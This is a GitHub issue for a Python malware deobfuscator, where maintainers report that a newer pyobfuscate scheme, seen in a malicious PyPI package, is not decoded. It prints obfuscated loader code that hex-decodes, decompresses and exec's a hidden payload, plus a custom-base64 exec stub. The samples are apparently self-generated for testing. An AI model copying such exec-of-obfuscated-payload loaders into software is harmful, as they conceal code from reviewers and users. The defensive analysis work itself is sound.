Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[FIX] pyobfuscate not being detected/deobfuscated properly #49

Open
IlluminatiFish opened this issue Jul 16, 2024 · 2 comments
Open

[FIX] pyobfuscate not being detected/deobfuscated properly #49

IlluminatiFish opened this issue Jul 16, 2024 · 2 comments
Assignees
@FieryIceStickie
Labels
bug Something isn't working

Comments

@IlluminatiFish
Copy link
Member

https://inspector.pypi.io/project/whoisbuild/1.0.1/packages/91/2b/0be0b33c7a81a7bd66820ac29d02245f6b90efbecd8729d100de73cd3bae/whoisbuild-1.0.1.tar.gz/whoisbuild-1.0.1/whoisbuild/utils.py

For some reason this pyobfuscate sample is not being detected nor deobfuscated properly even if the obfuscation schema is supplied explicitly.
@IlluminatiFish IlluminatiFish changed the title pyobfuscate not being detected/deobfuscated properly [FIX] pyobfuscate not being detected/deobfuscated properly Jul 16, 2024
@IlluminatiFish IlluminatiFish added the bug Something isn't working label Jul 16, 2024
@FieryIceStickie
Copy link
Member

This seems to have been further obfuscated after the pyobfuscate, if not a different obfuscation schema entirely. I'll look into it and see if this should be added into the existing pyobfuscate deobf, or be its own thing entirely.

@Realswitzer
Copy link
Contributor

Realswitzer commented Aug 8, 2024
edited
Loading

Seemingly pyobfuscate uses a new schema. Generated 3 samples earlier and none were deobfuscated. Tested with a simple one line program (print("hi")), and the file contents look similar to the whoisbuild sample included above.

Tested on latest version @ a1c7ee2

switzrr@switz-nyarch ~/dev/mal/testing % vipyr-deobf -ds -t=pyobfuscate pyobfuscate-2.py
[2024-08-08 07:58:10,176]:INFO:Running deobf of pyobfuscate-2.py with schema <pyobfuscate>
[2024-08-08 07:58:10,176]:INFO:Running pyobfuscate
[2024-08-08 07:58:10,177]:ERROR:Payload not found
[2024-08-08 07:58:10,177]:INFO:Code has been deobfuscated successfully
Traceback (most recent call last):
  File "/home/switzrr/.local/bin/vipyr-deobf", line 8, in <module>
    sys.exit(run())
             ^^^^^
  File "/home/switzrr/dev/vipyrsec-deobfuscator/src/vipyr_deobf/cli.py", line 160, in run
    output = run_deobf(data, schema)
             ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/switzrr/dev/vipyrsec-deobfuscator/src/vipyr_deobf/cli.py", line 73, in run_deobf
    return format_func(*results) if isinstance(results, tuple) else format_func(results)
                                                                    ^^^^^^^^^^^^^^^^^^^^
  File "/home/switzrr/dev/vipyrsec-deobfuscator/src/vipyr_deobf/deobfuscators/pyobfuscate.py", line 136, in format_pyobfuscate
    webhooks = WEBHOOK_REGEX.findall(deobfed_code)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: expected string or bytes-like object, got 'NoneType'

apologies in advance for the sample, it ends up breaking markdown so trying to use code tags is annoying

Obfuscated sample, formatted with `black`

pyobfuscate = lambda getattr: [
((lambda IIlII, IlIIl: setattr(__builtins__, IIlII, IlIIl))(IIlII, IlIIl))
for IIlII, IlIIl in getattr.items()
]
Il = chr(114) + chr(101)
lI = r"[^a-zA-Z0-9]"
lIl = chr(115) + chr(117) + chr(98)
lllllllllllllll, llllllllllllllI, lllllllllllllIl, lllllllllIIllIIlI = (
__import__,
getattr,
bytes,
exec,
)

__import__("sys").setrecursionlimit(100000000)
lllllllllIIllIIlI(
llllllllllllllI(
lllllllllllllll(lllllllllllllIl.fromhex("7a6c6962").decode()),
lllllllllllllIl.fromhex("6465636f6d7072657373").decode(),
)(
lllllllllllllIl.fromhex(
"789ced5deb6eeb380e7e95ecafda6d26c8fe4d91579817080221a74dbb01d2e620cdc1cc60b1efbebe5b122f2265e5d21c07834e2d8914f9f12345db6d8f31cbfde6e3c7eb666216a77f7e6eb347933f9bb9597e9d8ecfa6fc2c5f772fa762a85b375f98f9cc9897c3ebd698d9cbc16c8eef2f875f9fa77abd59fe79f8dc16dfcf97665e0e2d8dc95685ca2c9f16ff554bb26a789ed92acba97e6c61aa116751b1a05a98aff366ab4262b57e26b7403e8d178bdd697b9c12738557b58219ae0399b247b23ccf57a61c58545f1fabafeb278d3e4bd72a33f5f463ade8a9fa5a60d07aeadb5f44b25cffb2df7c7d1933850b166ffbc3e6e47b6fec00eb11688cad6d55391b29e6c89318d5bcf25c5c1c8eaf537f6cb5761071c9e01a520ed56a135106f329f7c36bedd727c3b2a0fe1c59e8b3e1757774b9402ffddc7c6cfbb5c358915535054a54fee545b1997b5eb680fe67fbf714b1ed7d8b7bd18afd3cfc350583effbc38fcdfe6bea7af3be3d6d4ea7a3635c5624d54acfc1ac4ff938120f50d08f583a942a8aa16902031c13d26819a884280bd14a6bc595eabab6a770f2c284c11414a5cf4fc4f2d326d0cbe1e3e7be4ac8bedebdedf67d2e92c5b23161dad64bec33a086763389626deb33646cea9d1eb3e6ffcd7ef8fe79378dcf3b57054a797e068345e2a9736518c1a35d0a1eab6d6529bb4bef34151310d684685f7be87d2a0c844d551738024467646b46ad4f4e6c5bb6ece0a606ad4ee5a7ad1dc5dd0a595fba45fffd5f7de710dbdb2608537c9e26e489d570e7ba6e6eb50eb02bcb84758eaf9acd554c318cb99be865a24ef50a1545f96cc2487cbd90cf89e403a2917c089ca94a5ed8b44d9977dd5388652f9821b70fed5389597d91b5924ab176b3d8434be8d5372f67f649c1b4a559d2ee2d0d4f7d6fc65cbe5c2e737dbe2d71d3be355624eafba44af445a094f8a335d6bd856c9f33d56ddf154a4a1c8ebe6c4cef714ec46d49ea34c304fc32695f0ce9e102a5c4cb234e036f99a46c63495b496574fa16c731a15a7bb0a0c1f01d103c331058dcadc7df1b347947cbe75846463d0cb1d70e3b24cf734a6295bf3fde24c7a0fff8de2a6f5523d76d99e58ff66600b22767752b9365fe7028f473545309c4ee0dc7c91a2ddbd3f91ac4bf7cecb1dd7f6d81359531f3019ae1161c2ff3fced70ac7cdc7d961d606e3deac79f49fa66d48c58748752dc6d9b1b568744a2b85672ce6b8fc50a2ecb9a173eb3ceac790340fda4a4c480f4d9ba91288c58a32f5ffa5b0b2b4eed4586589e4176d9cb8aef71ce0baa1581530513f7c85a70620c6bf94d577cc19b44746f67eb5698eb2d613739657730b064015b9177969812fb2b7140516f8f25c0bb40121b383bc891a5822a89667720f13f18806d8fb401a85b7ce781bca956465a785b328df3891b86012c9f72c43ce2d0ca2ceb2df3ea89be56b64561061717d74ff678f57f7bc45f005778eadcf4c397a15a48c58e09e59729be01a193b0159b6acca794335e5bb300b19a2bebfac08ee08af3d13f869b0e174fc5b8998d0cc4a95f46f10086f71a03fe28300ca5b2ad065b40f19fc209ae9fc532349cf59c39b6343f0b5451e3422d021865a8fa660fcdf690f5420f67025a21d603610a279f059298bb6a15c595b6b4774e5ebe315502f2c980c7528bf5d5f875b6fddc46e5245c00ab2f33e08f02c3509ebb1c840b54c9e1ec4ea8257841b21fc537603463a5bd5c406c5bd5ad5455c10406e2b0fe535f563151de2e1d5178bb1964b853069747f67515aa354a6d7777f61385a18586da3074b81b7c2cbb5d144751201af6b41c3ec41fc63c5c8b0c41c25b11f7fc8584908a5002092900ed9c1b70192da232c7d724edba8979e5b410666d62313c54022991b7876928ef91743c5b22a11ab9cb39116a1f18f4aa9198676eceedc0b5ef01a083d8920b0cf8a3c0b0206b34d470b7478d09dd5fcfd84b4f829ff53eb7d3a43349294c204cadd08fc19d7837c46470b80c61818fa35970734e15631de283ee20b39520265f061336c108211edf1b3ce25d9c186e22d6b878dcefd94ca0c20149db840fd350de23e978b68c7d651aee4240a03c035a35423c29be6293886000042f33e08f022c83e1d7c4d8dd1e35666c10d9eca2b8333688b8f932c083f671aa1807c61e5204954042ee453d37f6905e9052f490c4761c9012797b9886f21e49c7b365ec2107721722010519b4aa11af791c9b46641460188cb726a8eef6a83163d3c8a613c59db169c4cd97011eb48f53c53830368d22a80412722feab9b169f48234a869c4b7e100a46dc1876908ef916c3c4bc666310567b19da03c035a35021e385ef77d343417f3f177ec1b7905f81452e6eeb09b144cf8e340b12093d86d7067c61e04107bace7fddcd8839c936c3c4bc61e240567b19da03c035a3582bcf41cf88b8c313acef3db35183cbf5b3f83ed4ea84514cebcf900b582fa382bede5fc2c50357643bc8bb7ff6b350cb780f10e9765c820e6b976aa354a5d747776ae584ac3a9000fa21a1a34109ac3d2318a07480e1fe20f631eae458620e12d4502a060e686f32e7a3786b1416b5c3ceeb3e962b6e38094c8dbc33494f7483a9e2d91508ddca5ec40c4e010035f35d236fe83ef176ee26681741a2cbfcc803f0a0c0b5249c317747b67f7c85ed0578ce22b6b8a302bede5fc2c5075fe0643053637818148d6ae90e7211891e5faded29f42d9a5afb1c8263ce349c73489f26d881532407d0c33f0a1e542c85f6e0ee084a10f4980f502d026e792ba2b8eab99848fae30bd88b09fd87e7cbd81c03f767efd1c49042590b44df8300de53d928e674b24542377fd0988085420e53673bc7157d41e429e883c17915cce0e553609fc707776ae18afb4e107f1c7dde0e3daeda2c807c7281e20397c883f8c79b8161982bcb7288243ea20afc270ecd31d4e88c8b92ce724d8672991b5a95b5c3f11b981a720080260d96506fc5100211a2c5b8d2c6db0edb1f4e6f6a6314655f5b2fc2c5075fe3a22c5076be4e4ce00b4d10e86fa6ba60877345d8fb75d7873b12f6e20987da08de3f9785e5ed3dee2e8210a666e38837d9a688a979002d0ce090e3f400b8ab1416b5c3c545ef8f3ca6921ccdac41adff45d86743c5b22a11ab98bc28e1d7ea2b2d82dc67eb82ffa7ddf0d74b8b80e6cf16506fc51108f208d345c71b7478d197f4536481ca082746ae6ef2df0e39bff8a2ce94790fa123b6996b443c2138fcf2051404374fba6e4174c04f90704034c89ab5f9cf300375425cf3e820038f6e92ab02f4c2fc2ba227afbf19d2102ffd843f6737ddd5263479b810fd3e8dd23cf7882444235d2b507287cdc00b48491f3dd0b976bc6475a4d4805ea215dfe895d93f673418988b7316275ae0922bde9ac94d965dc645513d4f1d0bf11bff69d34b4165b7281017f5496e7b61a6c01c503777bd498f1fe994d495405e9d4ccdf5be0c71ddc3f33f8517631bca0acfb5e671085099b6084108fef0d36902e4e0c37116b5c3ceeaaf3a37552a301e802a1a7a1bc47d2f16c89846ae42e6507d811ea61c0ab46ec1ef1da1d228a03e6e36fd7248e3f4ce4e283154eb93321b4898501577029313a0cdb9c2b3642f2cd9a496516506b102f5d0b18fe7e338ad2de526c010a666e38efe2e467181bb4c6c5e30e8f6c615e9da177ba4fb2f12c89846ae4ac1306c0e0d8c632fe57fdf592917f5e2066b7aefb5d350ba6a67e685cae6a519c3a7359ee5e334b1b3dac34b6649de4df2ae55c5a27fe27af6e0a3e6409eeef25bc45761efe67f6ae102614c5384f2ef5638443ffca329123df2f4960e65fac9c5fc079a2965dd9d0f5b0dfed5aadd3fc919d01d2b717697d89ba7d1f50f6debed9fa148dcb87a1c83812fdb2e263eaf1c74753b7cde5d7dcb932fd35be3a772ba9a51e575e0f833df06190fdbdfa7abd23e61a1a32db8b841c174221be7be7491e73e604bc075f699f24c1a01c93e1e97535fede5e8c3a5c08f6400785511d54fa442ec8708a7174489418fc65d6b7d351e467b209456350e20ee9c4064457502db982c5cb3b83ee1857a9c42a197e18797aa99330497c140686aa10cc2d829f743167b86ea4b92c1c0e1e7fce86227e0efc971a258e0bec08321b712f1170aafe836e4b34a732724ea7baad8ea90b2004f1dd61ab44787874f8058b91b235ed14cbfa45fe8485d6463db2097988ee15aa3b898e58bc6e8a739b0d43f8d412c480ca4059dbd77e526553341913966e1b5633fc8cd3a48e2669e4f75e4270fad0a6eb2524c74e28238cd17554ad50f49b9de1a759f41d6fa7970dabc3503d9128da4637dc06e6191f91ee93a66e84771edad3daba759d6678cbc806776019218292ec89176ec2f978272dbd11e14dd166eb1e0db83a13bd3da5501c9a31127f1d87529d6042962126845b728969ea5e3cf2258d2668eafe66d04da1e2fe5c71726a8a5a3ee41d926eabb3d6875ac5a003487cffa1baa38ebb2b38c7d38e044ecaab92febe8d3d80848f8ca26ee4d894683fe77b1da26b36148109bee7093eda88d3a9a8b708d4699f5d70d82678421775372239b0d5376be25ef03cfd1b9a34672b62f2c8a5e2462826e7e977e29e11e6f5ebfbe2bfe72e12abac5602345563edcf03ccea8b222ec46a67a93fe18981b5bc6a4a3d2e451ac2ecc3c91052bc48d023549c154224029be0261242943ffe72775d35bb7ece9a1f5b9964cd779397c3eb7631d9febd3b65e5b7799efd3b9fecde269f87d3e465b3df6f7eecb7d9fbf6b4399d8e05577ffcdaed4fbbcf2f63a6938797c3c7cfdd7efb309dfc79f82c442787e3045b3a6b161622c67c1c5e7fedb7c614520f0ff9e45fcbc943bbf241a4e073f3e18ab7664cb6fbaf6d634a56274e0d5175517e9b1124a0a60acc5678ad5e3f2954956a2a41955442031c23cc3acfe2e15898be94ab6df00d51c967ab75a4a461816c7fe6a93ec6fae32c81ea6f4d92fcffc604324a".replace(
"\n", ""
)
)
).decode()
)

Using a longer script, it generated the following to run the payload:

fromstring1 = "-_+!1@2#3$4%5^6&7*8(9)0qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFG"
alphanumeric = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
lIlllllIl = "ihQlwp=="
lIIIIIlI = "e2)dtYTmyh)Eym=="
IlIlIlIIIIllI = "uq*h%(p="
IllIIllIlll = "+p=="


def fromb64(base64str):
    fromstring = (
        "-_+!1@2#3$4%5^6&7*8(9)0qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFG".encode()
    )
    alphanum = (
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".encode()
    )
    translatedbytes = bytes.maketrans(fromstring, alphanum)
    return base64.b64decode(base64str.translate(translatedbytes)).decode()


import zlib

exec(
    zlib.decompress(bytes.fromhex(payload.replace("!", "").replace("\n", ""))).decode(
        "utf-8"
    )
)

I'm confident enough saying that this is a new version/schema of pyobfuscate.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@FieryIceStickie FieryIceStickie

Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

When branches are created from issues, their pull requests are automatically linked.

49-fix-pyobfuscate-not-being-detecteddeobfuscated-properly vipyrsec/vipyrsec-deobfuscator
3 participants
@Realswitzer @IlluminatiFish @FieryIceStickie